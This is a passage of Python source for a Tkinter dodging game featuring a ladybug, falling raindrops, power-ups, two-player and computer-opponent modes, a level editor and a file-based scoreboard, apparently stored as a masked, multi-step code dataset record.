canvas.create_text(data.width / 2, 100, text='The Computer Won :(',\n font='Arial 23 bold', fill='yellow')\n elif data.winner == 'player2':\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.\n winScreen)\n canvas.create_image(300, 320, image=data.winBug)\n canvas.create_text(data.width / 2, 100, text=\n 'You Made it! You Won!', font='Arial 23 bold', fill='yellow')\n elif data.winner == 'tie':\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.\n winScreen)\n canvas.create_image(300, 320, image=data.winBug)\n canvas.create_text(data.width / 2, 100, text=\n 'Tie! You Both Made it!', font='Arial 23 bold', fill='yellow')\n\n\ndef scoreboardKeyPressed(event, data):\n if event.keysym == 'r':\n init(data)\n\n\ndef scoreboardMousePressed(event, data):\n checkHome(event, data)\n\n\ndef scoreboardTimerFired(data):\n difficultyTimerFired(data)\n\n\ndef scoreboardRedrawAll(canvas, data):\n canvas.create_image(data.width / 2, data.height / 2, image=data.background)\n canvas.create_image(data.width / 2, data.tbgY, image=data.tbg)\n for drop in data.editorDrops:\n drop.draw(canvas)\n canvas.create_text(data.width / 2, data.txtTScore, text='Top Scores!',\n font='Arial 30 bold', fill='yellow')\n canvas.create_text(data.width / 2, data.S_P, text='Score_Player', font=\n 'Arial 20 bold', fill='yellow')\n drawHome(canvas, data)\n data.savedScores\n data.savedScores = readFile('score.txt')\n score = data.savedScores.splitlines()\n scores = []\n for line in score:\n scores.append(line.split(','))\n scores = sorted(scores, key=lambda x: int(x[0]))\n top5 = scores[-data.numScores:]\n top5.reverse()\n for i in range(len(top5)):\n canvas.create_text(data.width / 2, data.scoreShift + i * 50, text=\n top5[i], font='Arial 18 bold', fill='yellow')\n\n\ndef helpKeyPressed(event, data):\n if event.keysym == 'r':\n init(data)\n\n\n<mask token>\n\n\ndef helpRedrawAll(canvas, data):\n canvas.create_image(data.width / 2, data.helpY, image=data.helpScreen)\n for drop in data.editorDrops:\n drop.draw(canvas)\n drawHome(canvas, data)\n\n\ndef run(width=15000, height=25000):\n\n def redrawAllWrapper(canvas, data):\n canvas.delete(ALL)\n redrawAll(canvas, data)\n canvas.update()\n\n def mousePressedWrapper(event, canvas, data):\n mousePressed(event, data)\n redrawAllWrapper(canvas, data)\n\n def keyPressedWrapper(event, canvas, data):\n keyPressed(event, data)\n redrawAllWrapper(canvas, data)\n\n def timerFiredWrapper(canvas, data):\n timerFired(data)\n redrawAllWrapper(canvas, data)\n canvas.after(data.timerDelay, timerFiredWrapper, canvas, data)\n\n\n class Struct(object):\n pass\n data = Struct()\n data.width = width\n data.height = height\n data.timerDelay = 100\n root = Tk()\n init(data)\n canvas = Canvas(root, width=data.width, height=data.height)\n canvas.pack()\n root.bind('<Button-1>', lambda event: mousePressedWrapper(event, canvas,\n data))\n root.bind('<Key>', lambda event: keyPressedWrapper(event, canvas, data))\n timerFiredWrapper(canvas, data)\n root.mainloop()\n print('bye!')\n\n\n<mask token>\n", "step-4": "<mask token>\n\n\ndef init(data):\n data.score = 0\n data.mode = 'splashScreen'\n data.timerDelay = 100\n data.height = 800\n data.width = 800\n data.speed = 10\n data.speedAI = 12\n data.speedAI2 = 12\n data.switchOnProgress = False\n data.r = 25\n data.cx = 280\n data.cy = 750\n data.onLeft1, data.onLeft2 = True, True\n data.win = False\n data.coconuts = []\n data.powerUps = []\n data.coconuts1 = []\n data.coconuts2 = []\n data.coconutsAI1 = []\n data.coconutsAI2 = []\n data.invincible = []\n data.pauseDrops = False\n data.pause1Drop = False\n data.pause2Drop = False\n init1(data)\n\n\ndef init1(data):\n data.beInvincible = False\n data.Invincible1 = False\n data.Invincible2 = False\n data.scaryBug = []\n data.time = 0\n data.coconutFall = False\n data.sides = ['r', 'l']\n data.level = 1\n data.splashScreenTime = 0\n data.splashScreenDrops = []\n data.background = PhotoImage(file='tree.gif')\n data.deadScreen = PhotoImage(file='deadBug.gif')\n data.ladyBug = PhotoImage(file='lady.gif')\n data.winScreen = PhotoImage(file='treeTop1.gif')\n data.winBug = PhotoImage(file='littleBug.gif')\n data.halfBackground = PhotoImage(file='halfTree.gif')\n data.umbrella = PhotoImage(file='umbrella2.gif')\n data.spider = PhotoImage(file='spider.gif')\n data.hourGlass = PhotoImage(file='hourGlass.gif')\n data.splashScreen = PhotoImage(file='splash.gif')\n init2(data)\n\n\ndef init2(data):\n data.tbg = PhotoImage(file='tbg2.gif')\n data.click = PhotoImage(file='click.gif')\n data.notClick = PhotoImage(file='notClick.gif')\n data.player1X = 150\n data.player1Y = 750\n data.player2X = 550\n data.player2Y = 750\n data.winner = None\n data.speed = 12\n data.speed2 = 12\n data.editorTime = 0\n data.editorDrops = []\n data.margin = 100\n data.enter = False\n data.powerUpsEditor = None\n data.yourSpeed = None\n data.rainSpeed = None\n data.slow = data.notClick\n data.medium = data.notClick\n data.fast = data.notClick\n data.drizzle = data.notClick\n data.rain = data.notClick\n data.thunderstorm = data.notClick\n init3(data)\n\n\ndef init3(data):\n data.yes = data.notClick\n data.no = data.notClick\n data.enter = data.notClick\n data.levelEditorLives = 2\n data.rSpeed = None\n data.start = None\n data.start1 = None\n data.start2 = None\n data.difficulty = None\n data.mode1 = data.notClick\n data.mode2 = data.notClick\n data.mode3 = data.notClick\n data.mode4 = data.notClick\n data.mode5 = data.notClick\n data.mode6 = data.notClick\n data.home = PhotoImage(file='home.gif')\n data.helpScreen = PhotoImage(file='help1.gif')\n data.title = PhotoImage(file='title.gif')\n data.scoreList = []\n data.spotList = [270, 364, 458, 552, 646, 740]\n data.savedScores = readFile('score.txt')\n if data.mode == 'levelCreated':\n setEverything(data)\n initsplashScreenNumbers(data)\n\n\ndef initsplashScreenNumbers(data):\n data.splashButtonY = 425\n data.p1ButtonX = 225\n data.p2ButtonX = 290\n data.edButton = 355\n data.diffButton = 425\n data.helpButton = 490\n data.sboardButton = 555\n data.hitPenalty = 75\n data.splashText = data.height / 2 - 20\n data.lives = 2\n data.levelMax = 8\n data.lane = 94\n data.Player1Min = 270\n data.Player1Max = 740\n data.homeX = 50\n data.homeY = 650\n initScoreBoardHelp(data)\n init1Player(data)\n\n\ndef initScoreBoardHelp(data):\n data.tbgY = 5 * data.height / 12\n data.txtTScore = 150\n data.S_P = 220\n data.numScores = 5\n data.scorePos = data.height / 10\n data.scoreShift = 270\n data.helpY = data.height / 2 - 20\n data.name = ''\n data.printName = ''\n data.hit = False\n initAI(data)\n\n\ndef init1Player(data):\n data.buffer = 40\n\n\ndef initAI(data):\n data.AITY = 225\n data.easyX = 200\n data.easyY = 300\n data.medX = 400\n data.hardX = 600\n data.enterY = 450\n data.difS = 4\n data.difM = 6\n data.difH = 8\n data.last = 500\n data.enterX = 575\n data.PUT = 450\n data.RST = 350\n data.YST = 250\n\n\ndef mousePressed(event, data):\n if data.mode == 'splashScreen':\n splashScreenMousePressed(event, data)\n elif data.mode == '1Player':\n playerMousePressed(event, data)\n elif data.mode == '2Player':\n twoPlayerMousePressed(event, data)\n elif data.mode == 'editor':\n editorMousePressed(event, data)\n elif data.mode == 'levelCreated':\n levelCreatedMousePressed(event, data)\n elif data.mode == 'AI':\n AIMousePressed(event, data)\n elif data.mode == 'difficulty':\n difficultyMousePressed(event, data)\n elif data.mode == 'scoreboard':\n scoreboardMousePressed(event, data)\n elif data.mode == 'help':\n helpMousePressed(event, data)\n\n\ndef keyPressed(event, data):\n if data.mode == 'splashScreen':\n splashKeyPressed(event, data)\n elif data.mode == '1Player':\n playerKeyPressed(event, data)\n elif data.mode == '2Player':\n twoPlayerKeyPressed(event, data)\n elif data.mode == 'editor':\n editorKeyPressed(event, data)\n elif data.mode == 'levelCreated':\n levelCreatedKeyPressed(event, data)\n elif data.mode == 'AI':\n AIKeyPressed(event, data)\n elif data.mode == 'difficulty':\n difficultyKeyPressed(event, data)\n elif data.mode == 'scoreboard':\n scoreboardKeyPressed(event, data)\n elif data.mode == 'help':\n helpKeyPressed(event, data)\n\n\ndef timerFired(data):\n if data.mode == 'splashScreen':\n splashScreenTimerFired(data)\n elif data.mode == '1Player':\n playerTimerFired(data)\n elif data.mode == '2Player':\n twoPlayerTimerFired(data)\n elif data.mode == 'editor':\n editorTimerFired(data)\n elif data.mode == 'levelCreated':\n levelCreatedTimerFired(data)\n elif data.mode == 'AI':\n AITimerFired(data)\n elif data.mode == 'difficulty':\n difficultyTimerFired(data)\n elif data.mode == 'scoreboard':\n scoreboardTimerFired(data)\n elif data.mode == 'help':\n helpTimerFired(data)\n\n\ndef redrawAll(canvas, data):\n if data.mode == 'splashScreen':\n splashScreenRedrawAll(canvas, data)\n elif data.mode == '1Player':\n playerRedrawAll(canvas, data)\n elif data.mode == '2Player':\n twoPlayerRedrawAll(canvas, data)\n elif data.mode == 'editor':\n editorRedrawAll(canvas, data)\n elif data.mode == 'levelCreated':\n levelCreatedRedrawAll(canvas, data)\n elif data.mode == 'AI':\n AIRedrawAll(canvas, data)\n elif data.mode == 'difficulty':\n difficultyRedrawAll(canvas, data)\n elif data.mode == 'scoreboard':\n scoreboardRedrawAll(canvas, data)\n elif data.mode == 'help':\n helpRedrawAll(canvas, data)\n\n\ndef splashScreenMousePressed(event, data):\n if (data.splashButtonY - 2 * data.r <= event.x <= data.splashButtonY + \n 2 * data.r):\n if data.p1ButtonX - data.r <= event.y <= data.p1ButtonX + data.r:\n data.mode = '1Player'\n if data.p2ButtonX - data.r <= event.y <= data.p2ButtonX + data.r:\n data.mode = '2Player'\n if data.edButton - data.r <= event.y <= data.edButton + data.r:\n data.mode = 'editor'\n if data.diffButton - data.r <= event.y <= data.diffButton + data.r:\n data.mode = 'difficulty'\n if data.helpButton - data.r <= event.y <= data.helpButton + data.r:\n data.mode = 'help'\n if data.sboardButton - data.r <= event.y <= data.sboardButton + data.r:\n data.mode = 'scoreboard'\n\n\ndef splashKeyPressed(event, data):\n pass\n\n\ndef splashScreenTimerFired(data):\n data.splashScreenTime += 1\n if data.splashScreenTime % 2 == 1:\n rainDropSplash(data)\n for drop in data.splashScreenDrops:\n drop.onTimerFired(data)\n\n\ndef splashScreenButtons(canvas, data):\n canvas.create_image(data.splashButtonY, data.p1ButtonX, image=data.mode1)\n canvas.create_image(data.splashButtonY, data.p2ButtonX, image=data.mode2)\n canvas.create_image(data.splashButtonY, data.edButton, image=data.mode3)\n canvas.create_image(data.splashButtonY, data.diffButton, image=data.mode4)\n canvas.create_image(data.splashButtonY, data.helpButton, image=data.mode5)\n canvas.create_image(data.splashButtonY, data.sboardButton, image=data.mode6\n )\n\n\ndef rainDropSplash(data):\n xPosition = random.randint(0, 800)\n data.splashScreenDrops.append(Coconuts(xPosition, 0))\n\n\ndef splashScreenRedrawAll(canvas, data):\n canvas.create_image(data.width / 2, data.splashText - 10, image=data.title)\n for drop in data.splashScreenDrops:\n drop.draw(canvas)\n canvas.create_text(data.width / 2, data.splashText, text=\n \"\"\"\n 1.) Single Player Level Mode\n\n\n 2.) Two-Player Mode\n\n \n 3.) Level Creator Practice Mode\n\n \n 4.) Play Against the Computer\n\n \n 5.) Help and Instructions\n\n \n 6.) Scoreboard\n\n \n \"\"\"\n , font='Arial 14 bold', fill='yellow')\n splashScreenButtons(canvas, data)\n\n\ndef writeFile(path, contents):\n with open(path, 'wt') as f:\n f.write(contents)\n\n\ndef readFile(path):\n with open(path, 'rt') as f:\n return f.read()\n\n\nclass Coconuts(object):\n\n def __init__(self, x, y):\n self.x = x\n self.y = y\n self.r = 9\n self.fill = 'deep sky blue'\n self.speed = 30\n self.outline = 'blue'\n\n def draw(self, canvas):\n canvas.create_polygon(self.x, self.y - 2 * self.r, self.x - self.r,\n self.y, self.x, self.y + self.r, self.x + self.r, self.y, fill=\n self.fill, outline=self.outline, width=3)\n\n def onTimerFired(self, data):\n self.y += self.speed\n\n\ndef hit(data):\n for coconut in data.coconuts:\n if data.mode == '1Player' or data.mode == 'levelCreated':\n if coconut.y >= data.cy - data.r and coconut.y <= data.cy + data.r:\n if (coconut.x >= data.cx - data.r and coconut.x <= data.cx +\n data.r):\n data.cy += data.hitPenalty\n if data.mode == 'levelCreated':\n data.lives -= 1\n elif data.hit == False and data.level < data.levelMax:\n data.score -= data.level\n data.coconuts.remove(coconut)\n if data.mode == 'levelCreated':\n data.levelEditorLives -= 1\n\n\ndef hit2Player(data):\n if data.mode == '2Player':\n if data.Invincible1 == False:\n for coconut in data.coconuts1:\n if (coconut.y >= data.player1Y - data.r and coconut.y <= \n data.player1Y + data.r):\n if (coconut.x >= data.player1X - data.r and coconut.x <=\n data.player1X + data.r):\n data.player1Y += data.hitPenalty\n data.coconuts1.remove(coconut)\n if data.Invincible2 == False:\n for coconut in data.coconuts2:\n if (coconut.y >= data.player2Y - data.r and coconut.y <= \n data.player2Y + data.r):\n if (coconut.x >= data.player2X - data.r and coconut.x <=\n data.player2X + data.r):\n data.player2Y += data.hitPenalty\n data.coconuts2.remove(coconut)\n\n\nclass PowerUps(Coconuts):\n\n def __init__(self, x, y):\n super().__init__(x, y)\n\n def draw(self, canvas, data):\n canvas.create_image(self.x, self.y, image=data.hourGlass)\n\n\ndef hitPause(data):\n for powerUp in data.powerUps:\n if data.mode == '1Player' or data.mode == 'levelCreated':\n if powerUp.y >= data.cy - data.r and powerUp.y <= data.cy + data.r:\n if (powerUp.x >= data.cx - data.r and powerUp.x <= data.cx +\n data.r):\n data.pauseDrops = True\n data.start = data.cy\n data.powerUps.remove(powerUp)\n elif data.mode == '2Player' or data.mode == 'AI':\n if (powerUp.y >= data.player1Y - data.r and powerUp.y <= data.\n player1Y + data.r):\n if (powerUp.x >= data.player1X - data.r and powerUp.x <= \n data.player1X + data.r):\n data.pause1Drop = True\n data.start1 = data.player1Y\n data.powerUps.remove(powerUp)\n if (powerUp.y >= data.player2Y - data.r and powerUp.y <= data.\n player2Y + data.r):\n if (powerUp.x >= data.player2X - data.r and powerUp.x <= \n data.player2X + data.r):\n data.pause2Drop = True\n data.start2 = data.player2Y\n data.powerUps.remove(powerUp)\n\n\nclass Invincible(PowerUps):\n\n def __init__(self, x, y):\n super().__init__(x, y)\n\n def draw(self, canvas, data):\n canvas.create_image(self.x, self.y, image=data.umbrella)\n\n\ndef hitInvincible(data):\n for powerUp in data.invincible:\n if data.mode == '1Player' or data.mode == 'levelCreated':\n if powerUp.y >= data.cy - data.r and powerUp.y <= data.cy + data.r:\n if (powerUp.x >= data.cx - data.r and powerUp.x <= data.cx +\n data.r):\n data.beInvincible = True\n data.start = data.cy\n data.invincible.remove(powerUp)\n if data.mode == '2Player' or data.mode == 'AI':\n if (powerUp.y >= data.player1Y - data.r and powerUp.y <= data.\n player1Y + data.r):\n if (powerUp.x >= data.player1X - data.r and powerUp.x <= \n data.player1X + data.r):\n data.Invincible1 = True\n data.start1 = data.player1Y\n data.invincible.remove(powerUp)\n if (powerUp.y >= data.player2Y - data.r and powerUp.y <= data.\n player2Y + data.r):\n if (powerUp.x >= data.player2X - data.r and powerUp.x <= \n data.player2X + data.r):\n data.Invincible2 = True\n data.start2 = data.player2Y\n data.invincible.remove(powerUp)\n\n\nclass ScaryBug(object):\n\n def __init__(self, x, y):\n self.x = x\n self.y = y\n self.speed = 25\n\n def draw(self, canvas, data):\n canvas.create_image(self.x, self.y, image=data.spider)\n\n def onTimerFired(self, data):\n if data.mode == '2Player' or data.mode == 'AI':\n self.speed = 35\n self.y -= self.speed\n if (data.mode == '1Player' or data.mode == 'levelCreated' and data.\n time % 8 == 0):\n side = random.choice(data.sides)\n if side == 'l':\n if self.x - data.lane >= data.Player1Min:\n self.x -= data.lane\n else:\n self.x += data.lane\n elif side == 'r':\n if self.x + data.lane <= data.Player1Max:\n self.x += data.lane\n else:\n self.x -= data.lane\n\n\ndef hitScaryBug(data):\n for bug in data.scaryBug:\n if data.mode == '1Player' or data.mode == 'levelCreated':\n if (bug.y >= data.cy - 1.5 * data.r and bug.y <= data.cy + 1.5 *\n data.r):\n if (bug.x >= data.cx - 1.5 * data.r and bug.x <= data.cx + \n 1.5 * data.r):\n data.hit = True\n data.lives = 0\n data.levelEditorLives = 0\n if data.mode == '2Player' or data.mode == 'AI':\n if (bug.y >= data.player1Y - data.r and bug.y <= data.player1Y +\n data.r):\n if (bug.x >= data.player1X - data.r and bug.x <= data.\n player1X + data.r):\n data.winner = 'player2'\n if (bug.y >= data.player2Y - data.r and bug.y <= data.player2Y +\n data.r):\n if (bug.x >= data.player2X - data.r and bug.x <= data.\n player2X + data.r):\n data.winner = 'player1'\n\n\ndef drawPowerups(canvas, data):\n for bug in data.scaryBug:\n bug.draw(canvas, data)\n for powerUp in data.powerUps:\n powerUp.draw(canvas, data)\n for powerUp in data.invincible:\n powerUp.draw(canvas, data)\n\n\ndef drawHome(canvas, data):\n canvas.create_image(data.homeX, data.homeY, image=data.home)\n\n\ndef checkHome(event, data):\n if data.homeY - data.r <= event.y <= data.homeY + data.r:\n if data.homeX - data.r <= event.x <= data.homeX + data.r:\n init(data)\n\n\ndef coconutShot(data):\n if data.level > 0 and data.pauseDrops == False:\n if data.time % int(data.levelMax / data.level\n ) == 0 or data.time % 6 == 0:\n xPosition1 = random.randint(0, data.Player1Min - data.buffer)\n xPosition2 = random.randint(data.Player1Max + data.buffer, data\n .width + data.buffer)\n data.coconuts.append(Coconuts(xPosition1, 0))\n data.coconuts.append(Coconuts(xPosition2, 0))\n xPosition4 = random.randint(data.Player1Min - data.buffer, data\n .Player1Max + data.buffer)\n data.coconuts.append(Coconuts(xPosition4, 0))\n if data.time % 5 == 0:\n xPosition3 = random.randint(0, data.Player1Min - data.buffer)\n data.coconuts.append(Coconuts(xPosition3, 0))\n if data.time % int(24 / data.level) == 0:\n side = random.choice(data.sides)\n if side == 'l':\n data.coconuts.append(Coconuts(data.Player1Min, 0))\n elif side == 'r':\n data.coconuts.append(Coconuts(data.Player1Max, 0))\n powerUpCoconutShot(data)\n\n\ndef powerUpCoconutShot(data):\n if data.time % 60 == 0 and data.time % 120 != 0:\n Position = random.choice(data.spotList)\n data.powerUps.append(PowerUps(Position, 0))\n if data.time % 50 == 0:\n Position = random.choice(data.spotList)\n data.invincible.append(Invincible(Position, 0))\n if data.time % 100 == 0:\n Position = random.choice(data.spotList)\n data.scaryBug.append(ScaryBug(Position, 750))\n\n\ndef playerKeyPressed(event, data):\n if data.level < data.levelMax and event.keysym == 'r':\n init(data)\n if event.keysym == 'Left' and data.cx >= data.Player1Min + data.lane / 2:\n data.cx -= data.lane / 2\n elif event.keysym == 'Right' and data.cx <= data.Player1Max:\n data.cx += data.lane / 2\n if data.level >= data.levelMax:\n if len(event.keysym) == 1:\n if len(data.name) < 15:\n data.name += event.keysym\n if event.keysym == 'BackSpace':\n data.name = data.name[0:-1]\n if event.keysym == 'Return':\n data.scoreList += data.score, data.name\n writeFile('score.txt', data.savedScores + str(data.score) + ',' +\n data.name + '\\n')\n data.mode = 'scoreboard'\n\n\n<mask token>\n\n\ndef playerRedrawAll(canvas, data):\n canvas.create_image(data.width / 2, data.height / 2, image=data.background)\n canvas.create_line(0, 20, data.width, 20)\n for coconut in data.coconuts:\n coconut.draw(canvas)\n drawPowerups(canvas, data)\n canvas.create_image(data.cx, data.cy, image=data.ladyBug)\n canvas.create_text(data.width / 6, 50, text='Level: %d' % data.level,\n font='Arial 18 bold', fill='yellow')\n canvas.create_text(data.width / 6, 80, text='Score: %d' % data.score,\n font='Arial 18 bold', fill='yellow')\n canvas.create_text(2 * data.width / 3, 660, text=\n \"\"\"The greater the level, the more points get\n added to your score!\"\"\"\n , font='Arial 15 bold', fill='yellow')\n if data.hit == True:\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.\n deadScreen)\n canvas.create_text(data.width / 2, data.height / 4, text=\n 'You Lose! Better Luck Next Time!', font='Helvetica 23 bold',\n fill='yellow')\n canvas.create_text(data.width / 2, 280, text='Score: %d' % data.\n score, font='Arial 13 bold', fill='yellow')\n if data.level >= 8:\n madeIt(canvas, data)\n drawHome(canvas, data)\n\n\ndef madeIt(canvas, data):\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.winScreen)\n canvas.create_image(300, 320, image=data.winBug)\n canvas.create_text(data.width / 2, 70, text='You Made it!', font=\n 'Arial 23 bold', fill='yellow')\n canvas.create_text(data.width / 2, 100, text='Score: %d' % data.score,\n font='Arial 15 bold', fill='yellow')\n canvas.create_text(data.width / 2, 375, text=\n 'Congrats! Enter your Name!', font='Arial 15 bold', fill='yellow')\n canvas.create_rectangle(data.width / 2 - 50, 400, data.width / 2 + 50, \n 450, fill='white')\n canvas.create_text(data.width / 2, 425, text=data.name)\n\n\ndef drop2Player(data):\n if data.winner == None and data.pauseDrops == False:\n if data.time % 15 == 0:\n xPosition1 = random.randint(0, 385)\n if abs(xPosition1 - 100) > 25 and abs(xPosition1 - 360) > 25:\n if data.pause1Drop != True:\n data.coconuts1.append(Coconuts(xPosition1, 0))\n if data.pause2Drop != True:\n data.coconuts2.append(Coconuts(xPosition1 + 410, 0))\n if data.time % 12 == 0:\n side = random.choice(data.sides)\n if side == 'l':\n if data.pause1Drop != True:\n data.coconuts1.append(Coconuts(140, 0))\n if data.pause2Drop != True:\n data.coconuts2.append(Coconuts(540, 0))\n elif side == 'r':\n if data.pause1Drop != True:\n data.coconuts1.append(Coconuts(344, 0))\n if data.pause2Drop != True:\n data.coconuts2.append(Coconuts(755, 0))\n powerupDrop2Player(data)\n\n\ndef powerupDrop2Player(data):\n if data.time % 45 == 0 and data.time % 90 != 0:\n side = random.choice(data.sides)\n if side == 'l':\n if data.pause1Drop != True:\n data.powerUps.append(PowerUps(140, 0))\n if data.pause2Drop != True:\n data.powerUps.append(PowerUps(540, 0))\n elif side == 'r':\n if data.pause1Drop != True:\n data.powerUps.append(PowerUps(344, 0))\n if data.pause2Drop != True:\n data.powerUps.append(PowerUps(755, 0))\n if data.time % 60 == 0:\n side = random.choice(data.sides)\n if side == 'l':\n if data.pause1Drop != True:\n data.invincible.append(Invincible(140, 0))\n if data.pause2Drop != True:\n data.invincible.append(Invincible(540, 0))\n elif side == 'r':\n if data.pause1Drop != True:\n data.invincible.append(Invincible(344, 0))\n if data.pause2Drop != True:\n data.invincible.append(Invincible(755, 0))\n if data.time % 90 == 0:\n side = random.choice(data.sides)\n if side == 'l':\n data.scaryBug.append(ScaryBug(140, 750))\n data.scaryBug.append(ScaryBug(540, 750))\n elif side == 'r':\n data.scaryBug.append(ScaryBug(344, 750))\n data.scaryBug.append(ScaryBug(755, 750))\n\n\ndef twoPlayerKeyPressed(event, data):\n if event.keysym == 'r':\n init(data)\n if data.winner == None:\n if event.keysym == 'a' and data.onLeft1 == False:\n data.onLeft1 = True\n data.player1X = 150\n if event.keysym == 'd' and data.onLeft1 == True:\n data.onLeft1 = False\n data.player1X = 330\n if event.keysym == 'Left' and data.onLeft2 == False:\n data.onLeft2 = True\n data.player2X = 550\n if event.keysym == 'Right' and data.onLeft2 == True:\n data.onLeft2 = False\n data.player2X = 750\n\n\ndef twoPlayerMousePressed(event, data):\n checkHome(event, data)\n\n\ndef twoPlayerTimerFired(data):\n if data.winner == None:\n data.player1Y -= data.speed\n if data.player1Y < 15 and data.player2Y > 15:\n data.winner = 'player1'\n if data.player1Y > 40:\n data.time += 1\n drop2Player(data)\n data.player2Y -= data.speed\n if data.player2Y < 15 and data.player1Y > 15:\n data.winner = 'player2'\n if data.player2Y > 40:\n data.time += 1\n drop2Player(data)\n if data.player1Y < 15 and data.player2Y < 15:\n data.winner = 'tie'\n for powerUp in data.powerUps:\n powerUp.onTimerFired(data)\n hitPause(data)\n for powerUp in data.invincible:\n powerUp.onTimerFired(data)\n hitInvincible(data)\n for bug in data.scaryBug:\n bug.onTimerFired(data)\n hitScaryBug(data)\n powerupTimerFired(data)\n\n\ndef powerupTimerFired(data):\n for coconut in data.coconuts1:\n if data.pause1Drop == False:\n coconut.onTimerFired(data)\n hit2Player(data)\n for coconut in data.coconuts2:\n if data.pause2Drop == False:\n coconut.onTimerFired(data)\n if data.start1 != None:\n if abs(data.start1 - data.player1Y) >= 120:\n data.pause1Drop = False\n data.Invincible1 = False\n if data.start2 != None:\n if abs(data.start2 - data.player2Y) >= 120:\n data.pause2Drop = False\n data.Invincible2 = False\n\n\ndef twoPlayerRedrawAll(canvas, data):\n canvas.create_image(data.width / 4, data.height / 2, image=data.\n halfBackground)\n canvas.create_image(3 * data.width / 4, data.height / 2, image=data.\n halfBackground)\n canvas.create_line(data.width / 2, 0, data.width / 2, data.height, width=10\n )\n canvas.create_line(0, 20, data.width, 20)\n for coconut in data.coconuts1:\n coconut.draw(canvas)\n for coconut in data.coconuts2:\n coconut.draw(canvas)\n drawPowerups(canvas, data)\n canvas.create_image(data.player1X, data.player1Y, image=data.ladyBug)\n canvas.create_image(data.player2X, data.player2Y, image=data.ladyBug)\n canvas.create_text(50, 40, text='Player 1', font='Arial 15 bold', fill=\n 'yellow')\n canvas.create_text(450, 40, text='Player 2', font='Arial 15 bold', fill\n ='yellow')\n winner(canvas, data)\n drawHome(canvas, data)\n\n\ndef winner(canvas, data):\n if data.winner == 'player1':\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.\n winScreen)\n canvas.create_image(300, 320, image=data.winBug)\n canvas.create_text(data.width / 2, 100, text=\n 'You Made it! Player 1', font='Arial 23 bold', fill='yellow')\n elif data.winner == 'player2':\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.\n winScreen)\n canvas.create_image(300, 320, image=data.winBug)\n canvas.create_text(data.width / 2, 100, text=\n 'You Made it! Player 2', font='Arial 23 bold', fill='yellow')\n elif data.winner == 'tie':\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.\n winScreen)\n canvas.create_image(300, 320, image=data.winBug)\n canvas.create_text(data.width / 2, 100, text=\n 'Tie! You Both Made it!', font='Arial 23 bold', fill='yellow')\n\n\ndef editorKeyPressed(event, data):\n if event.keysym == 'r':\n init(data)\n\n\ndef editorMousePressed(event, data):\n checkHome(event, data)\n if data.easyY - data.r <= event.y <= data.easyY + data.r:\n if data.easyX - 2 * data.r <= event.x <= data.easyX + 2 * data.r:\n data.yourSpeed = 'slow'\n data.slow = data.click\n data.medium, data.fast = data.notClick, data.notClick\n if data.medX - 2 * data.r <= event.x <= data.medX + 2 * data.r:\n data.yourSpeed = 'medium'\n data.medium = data.click\n data.slow, data.fast = data.notClick, data.notClick\n if data.hardX - 2 * data.r <= event.x <= data.hardX + 2 * data.r:\n data.yourSpeed = 'fast'\n data.fast = data.click\n data.slow, data.medium = data.notClick, data.notClick\n checkMiddle(event, data)\n checkLast(event, data)\n\n\ndef checkMiddle(event, data):\n if data.medX - data.r <= event.y <= data.medX + data.r:\n if data.easyX - 2 * data.r <= event.x <= data.easyX + 2 * data.r:\n data.rainSpeed = 'drizzle'\n data.drizzle = data.click\n data.rain, data.thunderstorm = data.notClick, data.notClick\n if data.medX - 2 * data.r <= event.x <= data.medX + 2 * data.r:\n data.rainSpeed = 'rain'\n data.rain = data.click\n data.drizzle, data.thunderstorm = data.notClick, data.notClick\n if data.hardX - 2 * data.r <= event.x <= data.hardX + 2 * data.r:\n data.rainSpeed = 'thunderstorm'\n data.thunderstorm = data.click\n data.drizzle, data.rain = data.notClick, data.notClick\n\n\ndef checkLast(event, data):\n if data.last - data.r <= event.y <= data.last + data.r:\n if data.easyY - 2 * data.r <= event.x <= data.easyY + 2 * data.r:\n data.powerUpsEditor = True\n data.yes, data.no = data.click, data.notClick\n if data.last - 2 * data.r <= event.x <= data.last + 2 * data.r:\n data.powerUpsEditor = False\n data.no, data.yes = data.click, data.notClick\n if data.enter == data.click:\n if data.enterX - data.r <= event.y <= data.enterX + data.r:\n if data.medX - 2 * data.r <= event.x <= data.medX + 2 * data.r:\n data.mode = 'levelCreated'\n\n\ndef drawButtons(canvas, data):\n data.font, data.fill = 'Helvetica 13 bold', 'yellow'\n canvas.create_text(data.medX, data.YST, text='Your Speed:', font=data.\n font, fill=data.fill)\n canvas.create_image(data.easyX, data.easyY, image=data.slow)\n canvas.create_text(data.easyX, data.easyY, text='Slow', font=data.font)\n canvas.create_image(data.medX, data.easyY, image=data.medium)\n canvas.create_text(data.medX, data.easyY, text='Medium', font=data.font)\n canvas.create_image(data.hardX, data.easyY, image=data.fast)\n canvas.create_text(data.hardX, data.easyY, text='Fast', font=data.font)\n canvas.create_image(data.easyX, data.medX, image=data.drizzle)\n canvas.create_text(data.medX, data.RST, text='Rain Speed:', font=data.\n font, fill=data.fill)\n canvas.create_text(data.easyX, data.medX, text='Drizzle', font=data.font)\n canvas.create_image(data.medX, data.medX, image=data.rain)\n canvas.create_text(data.medX, data.medX, text='Rain', font=data.font)\n canvas.create_image(data.hardX, data.medX, image=data.thunderstorm)\n canvas.create_text(data.hardX, data.medX, text='Heavy', font=data.font)\n canvas.create_text(data.medX, data.PUT, text='PowerUps?', font=data.\n font, fill=data.fill)\n canvas.create_image(data.easyY, data.last, image=data.yes)\n canvas.create_text(data.easyY, data.last, text='Yes', font=data.font)\n canvas.create_image(data.last, data.last, image=data.no)\n canvas.create_text(data.last, data.last, text='No', font=data.font)\n changeEnter(canvas, data)\n\n\ndef changeEnter(canvas, data):\n if (data.powerUpsEditor != None and data.yourSpeed != None and data.\n rainSpeed != None):\n data.enter = data.click\n canvas.create_image(data.medX, data.enterX, image=data.enter)\n canvas.create_text(data.medX, data.enterX, text='Enter', 